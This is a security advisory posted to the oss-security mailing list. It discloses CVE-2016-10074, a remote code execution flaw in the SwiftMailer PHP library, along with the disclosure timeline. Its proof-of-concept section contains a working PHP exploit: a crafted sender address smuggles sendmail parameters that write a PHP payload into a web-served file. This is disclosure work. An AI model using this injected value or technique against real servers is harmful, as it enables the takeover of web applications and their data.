Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 28 Dec 2016 16:57:28 -0200
From: Dawid Golunski <dawid@...alhackers.com>
To: oss-security@...ts.openwall.com
Subject: SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)

SwiftMailer <= 5.4.5-DEV Remote Code Execution
CVE-2016-10074

Discovered by: Dawid Golunski (@...id_golunski)
https://legalhackers.com

Desc:

An independent research uncovered a critical vulnerability in SwiftMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.

To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the SwiftMailer class.

Despite the significant efforts in responsibly disclosing the vulnerability
to the vendor (since 2nd December).
The vulnerability remains unfixed as of 28 December.


The full current advisory at:

https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

Copy attached to this msg.

The Video PoC will be very similar to:
http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

The SwiftMailer PoC exploit:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt

Updates:
https://twitter.com/dawid_golunski

-- 
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski



    __                     __   __  __           __                 
   / /   ___  ____ _____ _/ /  / / / /___ ______/ /_____  __________
  / /   / _ \/ __ `/ __ `/ /  / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
 / /___/  __/ /_/ / /_/ / /  / __  / /_/ / /__/ ,< /  __/ /  (__  ) 
/_____/\___/\__, /\__,_/_/  /_/ /_/\__,_/\___/_/|_|\___/_/  /____/  
           /____/                                                   



=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com

- CVE-2016-10074
- Release date: 28.12.2016
- Revision 1.0
- Severity: Critical
=============================================


I. VULNERABILITY
-------------------------

SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)


II. BACKGROUND
-------------------------

"Swift Mailer is a component-based library for sending e-mails from PHP applications."

"Swift Mailer began back in 2005 as a one-class project for sending mail over SMTP. 
It has since grown into the flexible component-based library that is in development today."

SwiftMailer library is used by major PHP projects including some of the
most popular PHP programming frameworks such as Yii2, Laravel, Symfony.

https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/introduction.rst
https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/overview.rst

Symfony / Yii / Laravel frameworks:

http://symfony.com/doc/current/email.html

https://github.com/yiisoft/yii2-swiftmailer

https://laravel.com/docs/5.1/mail


III. INTRODUCTION
-------------------------

An independent research uncovered a critical vulnerability in SwiftMailer that 
could potentially be used by (unauthenticated) remote attackers to achieve 
remote arbitrary code execution in the context of the web server user and 
remotely compromise the target web application.

To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the SwiftMailer class.

Despite the significant efforts in responsibly disclosing the vulnerability
to the vendor. The vulnerability remains unfixed as of 28 December.

Note: This advisory is limited.
Remaining attack vectors/exploits will be disclosed at a later date to allow
more time for patching.

IV. DESCRIPTION
-------------------------


SwiftMailer class uses PHP mail() function as its default transport.

SwiftMailer suffers from the same vulnerability as the one disclosed in
PHPMailer:

http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html


The following Sender address:

"Attacker -Param2 -Param3"@...t.com

would cause SwiftMailer/mail() function to execute /usr/bin/sendmail with the
following list of arguments:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker -Param2 -Param3@...t.com]

which would not work for the attacker (Param2 and Param3 are passed within
the same argument of argv[3] )


Attackers can however break out of parameter no.3 with some extra escaping.

For example, by injecting an extra sequence of \" after the first argument,
the following Sender email:

"Attacker \" -Param2 -Param3"@...t.com

when passed to SwiftMailer (and eventually to mail()) function would cause
sendmail to execute with:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@...t.com]


Which as can be seen would inject additional parameters of 4 & 5 to sendmail.


Attackers can exploit this to achieve code execution as shown in the PoC
below.



V. PROOF OF CONCEPT EXPLOIT
-------------------------

<?php
 
/*
 
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
 
Discovered/Coded by:
 
Dawid Golunski
https://legalhackers.com
 
Full Advisory URL:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html

Video PoC
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html


Follow the feed for updates:

https://twitter.com/dawid_golunski

 
A simple PoC (working on Sendmail MTA)
 
It will inject the following parameters to sendmail command:
 
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@...il.com]


which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.

The resulting file will contain the payload passed in the body of the msg:
 
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<< 
09607 <<< <?php phpinfo(); ?>
09607 <<< 
09607 <<< 
09607 <<< 
 
 
See the full advisory URL for the exploit details.
 
*/
 
 
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
 
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@...il.com';

// ------------------
 
// mail() param injection via the vulnerability in SwiftMailer

require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);

// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
  ->setFrom(array($email_from => 'PoC Exploit Payload'))
  ->setTo(array('receiver@...ain.org', 'other@...ain.org' => 'A name'))
  ->setBody('Here is the message itself')
  ;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);




~~~~~~~~~~~

The researcher also developed an Unauthenticated RCE exploit for a popular 
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has 
fixed the vulnerabilities.

Video PoC:
~~~~~~~~~~~~~

https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html


VI. BUSINESS IMPACT
-------------------------

A successful exploitation could let remote attackers to gain access to 
the target server in the context of the web server account which could
lead to a full compromise of the web application.

 
VII. SYSTEMS AFFECTED
-------------------------

All versions of SwiftMailer including the latest of 5.4.5-DEV are affected.


VIII. SOLUTION / VENDOR RESPONSE
-------------------------


The vulnerability was responsibly disclosed to SwiftMailer vendor. 
The first contact attempts started on the 2nd of December.
Unfortunatelly the vendor has not fixed the SwiftMailer library to date and
it remains vulnerable. 
Because of this users of SwiftMailer (which includes various frameworks that make
use of the library) remain at risk.

The vendor was advised by the researcher of the upcoming exploit for another
library (PHPMailer) which, when published along with the new release, would make
it possible for malicious users to "connect the dots" and use the same payloads
to attack SwiftMailer users.

The last attempt of contact (resending the tested PoC exploit) was made on Dec 26th
to which the vendor have not replied.

As after the publication of PHPMailer exploit other users did start to see the
similarities and file public vulnerability reports, there is no more point in 
keeping this advisory private.

CVE MITRE assigned the following ID to this vulnerability: 

CVE-2016-10074 

upon the request made by the researcher.

 
IX. REFERENCES
-------------------------

https://legalhackers.com

This (CVE-2016-10074) advisory:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html

Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html

Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt

Other exploits with other attack vectors will be disclosed at a later date to 
allow more time for patching.

CVE-2016-10074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10074

SwiftMailer github

https://github.com/swiftmailer/swiftmailer


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com

Thanks to SecuriTeam for help with disclosing the vulnerability to the vendor.
 
XI. REVISION HISTORY
-------------------------

28.12.2016 - Limited advisory released
 

XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.


Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ